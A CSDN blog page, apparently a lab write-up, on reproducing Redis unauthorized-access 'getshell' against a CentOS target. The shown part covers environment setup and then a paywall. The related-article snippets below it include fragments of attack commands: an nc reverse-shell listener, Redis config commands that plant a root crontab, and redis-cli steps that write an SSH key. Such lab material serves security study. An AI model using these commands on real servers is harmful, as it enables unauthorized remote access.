《Redis未授权访问getshell》复现笔记(一)

最新推荐文章于 2024-08-05 21:22:29 发布
最新推荐文章于 2024-08-05 21:22:29 发布
阅读量732 收藏 1
点赞数
分类专栏: 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/limb0/article/details/100768767
版权
本文详细记录了复现Redis未授权访问getshell的过程,包括环境介绍、环境搭建(Web服务和Redis服务)以及漏洞利用。通过在攻击机上安装Redis客户端,成功连接并写入phpinfo、shell和木马文件到靶机Web目录。
摘要由CSDN通过智能技术生成

《Redis未授权访问getshell》复现笔记(一)

利用周末复现了一下Redis未授权访问getshell,期间遇到了一些坑,虽然结果没什么悬念,却花费了不少时间,故将过程详细记录,留给有需要的人。此贴仅供新手参考,大佬勿喷。

一、 环境介绍

靶机:CentOS 6.5 (点击下载) IP:192.168.17.140

攻击机:Win10(本机) IP:192.168.8.195

二、 环境搭建

1、 搭建web服务

这里我用的是phpStudy for Linux (lnmp+lamp一键安装包)
安装:

wget -c http://lamp.phpstudy.net/phpstudy.bin #获取文件
chmod +x phpstudy.bin    #权限设置
./phpstudy.bin     #运行安装

等待大约十几分钟安装完成。
在这里插入图片描述
我们访问http://192.168.17.140/看一下,如图所示,说明成功开启Web服务。

最低0.47元/天 解锁文章
limb0
关注
专栏目录
二十八种授权访问漏洞合集(暂时最全)
墨痕诉清风的博客
01-04 4756
目录 0x01 授权漏洞预览 0x02 Active MQ 授权访问 0x03 Atlassian Crowd 授权访问 0x04 CouchDB 授权访问 0x05 Docker 授权访问 0x06 Dubbo 授权访问 0x07 Druid 授权访问 0x08 Elasticsearch 授权访问 0x09 FTP 授权访问 0x10 HadoopYARN 授权访问 0x11 JBoss 授权访问 0x12 Jenkins 授权访问 0x13 Jupyt
redis授权访问getshell的方式
居上
06-28 2046
redis简介 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库 端口:6379 环境 kali =>192.168.60.134 cenos => 192.168.60.130 redis授权访问 Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上 ./redis-server 使用默认配置 ./red
Redis授权访问导致getshell
isxiaole的博客
11-09 3392
redis授权访问导致getshell redis授权访问漏洞利用
授权访问漏洞复现~~~】
最新发布
m0_59151303的博客
08-05 1167
步骤二:可使用Nmap扫描该端口是否开启服务,还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测…步骤二:如果存在授权访问漏洞则直接访问 http://IP:8888会直接跳到web管理界面,不需要输入密码。步骤二:ActiveMQ默认使用8161端口,默认用户名和密码是 admin/admin,在打开的页面输入…步骤二:在打开的URL中…步骤一:使用以下Fofa语法搜索使用Idap服务的产品.…步骤一:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!
redis授权到getshell
weixin_68408599的博客
06-12 1060
写入webshell虽然简单便捷,但是很多网站都严格限制了写入规则,但是可以通过定时任务,写入公钥等来获取webshell并建立持久性控制。自己使用需要小心,redis授权是比较常见的漏洞了,常常被用于执行挖矿病毒,甚至是勒索病毒。
redis 授权访问及getshell
Guoke324的博客
04-06 784
目录 redis授权访问 redis getshell方法 写 webshell 文件 利用 写SSH key进行 getshell 通过写corntab的方式进行getshell redis授权访问 Redis在默认情况下,会绑定在0.0.0.0:6379,如果没有采用限制IP访问,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下,会导致任意用户授权访问Redis以及读取Redis数据并写入公钥进行远程连接等。 利用python去检测,或者...
redis授权getshell四种方式
没有
04-24 4664
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
Redis授权访问getshell复现笔记(二)
limb0的博客
09-16 508
Redis授权访问getshell复现笔记(二) 复现完了写马getshell,我们再来复现一下利用crontab反弹shell: 使用nc.exe在攻击机上监听9999端口: nc –lvvp 9999 还是使用Redis Clinet写入如下命令 config set dir /var/spool/cron config set dbfilename root set xxx "\n...
HackTheBox:Cronos笔记
X
04-19 1284
HackTheBox:Cronos笔记 HackTheBox:Cronos WalkthroughHackTheBox:Cronos笔记信息收集NMAP53端口:获得域名80端口:Laravel -> DNS Zone Transfer -> Admin域传送漏洞digNmapnslookup反弹shell提权定时任务反思与总结reference 信息收集 NMAP # nmap...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5548
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处授权访问
Redis-Getshell:Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
Redis 授权访问漏洞与getshell(附getshell检测工具)
告白的博客
02-24 4094
Redis 简介. Redis 是完全开源免费的,遵守 BSD 协议,是一个灵活的高性能 key-value 数据结构存储,常见用来作为数据库,其在安全配置问题上存在一些问题,如常见的授权范围与Pickle反序列化
尝试从redis授权访问到getshell的四种姿势(失败)
风沙吹奏的博客
09-14 833
尝试从redis授权访问到getshell的四种姿势(失败) 使用Goby扫描某SRC的C段,发现一个Redis授权,经验证漏洞存在,故尝试Getshell提高危害(拿更多赏金) 虽然Getshell是失败了,但留个坑在这,以后看看失败的原因。 目录 crontab-计划任务 利用主从复制RCE 通过Web服务写入webshell 写ssh-keygen公钥然后使用私钥登录 1. crontab-计划任务 首先现在自己服务器上监听个端口,例如我这里的8998 nc -lvvp 8998 然后re
redis 授权访问shell
blackguest07的博客
03-18 1006
redis授权访问shell
Redis 授权访问与Get Shell漏洞
K1ose的博客
11-20 1043
Redis 授权访问与Get Shell漏洞 漏洞原理与危害 Redis默认情况下,会绑定在默认端口,如果没有采用相关策略,例如 ​ ①防火墙拦截非信任IP ​ ②端口屏蔽 会将Redis服务器暴露在公网上,如果没有设置口令认证,会导致任意用户在访问目标服务器时能够授权便访问Redis以及其数据。利用Redis自身提供的config命令进行写文件操作,可以将自己的SSH公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中,进而可以使用对应私钥直接使用ssh服务登陆目标
记录一次Redis授权getshell几种常见方法
qq_45888826的博客
09-17 3877
记录一次Redis授权getshell几种常见方法
redis 授权/知道密码 下getshell
问题很多的小明
06-20 499
常用的方法,计划任务,写webshell,主从复制,写公钥文件(会覆盖) 1 写公钥文件 ssh-keygen –t rsa (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt cat test.txt |redis-cli -h 192.168.0.109 -a 123456 -x set crackit redis-cli -h 192.168.0.109 -a 123456 config set dir /root/
Linux下Redis授权访问getshell三种方法 (1、秘钥登录)
daxi0ng的博客
11-26 2375
介绍: REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(H...
redis授权访问getshell
03-16
Redis授权访问是指Redis服务器的访问控制没有设置好,导致攻击者可以通过Redis的一些命令获取服务器的敏感信息或者执行恶意代码,从而实现getshell的攻击。为了避免这种情况发生,我们需要对Redis服务器进行安全配置,包括设置密码、限制访问IP等措施。同时,也需要及时更新Redis的版本,以防止已知漏洞被攻击利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值